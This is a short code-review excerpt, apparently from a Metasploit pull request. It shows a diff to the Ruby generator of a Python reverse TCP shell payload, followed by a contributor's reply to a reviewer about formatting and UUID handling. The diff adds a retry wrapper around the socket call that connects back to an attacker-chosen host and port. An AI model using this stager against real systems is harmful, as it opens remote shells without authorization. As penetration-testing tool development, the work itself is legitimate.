lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,14 +45,22 @@ def transport_config(opts={})
   def generate_reverse_tcp(opts={})
     # Set up the socket
     cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "import time\n"
+    cmd << "def connect():\n"
+    cmd << "\ttry:\n"
+    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     cmd << py_send_uuid if include_send_uuid
```

Comment:
I'm not getting the type of formatting used in the link. I'll go through it again. Thanks for the heads up and again regarding the the `uuid` I'll test it and update it. @timwr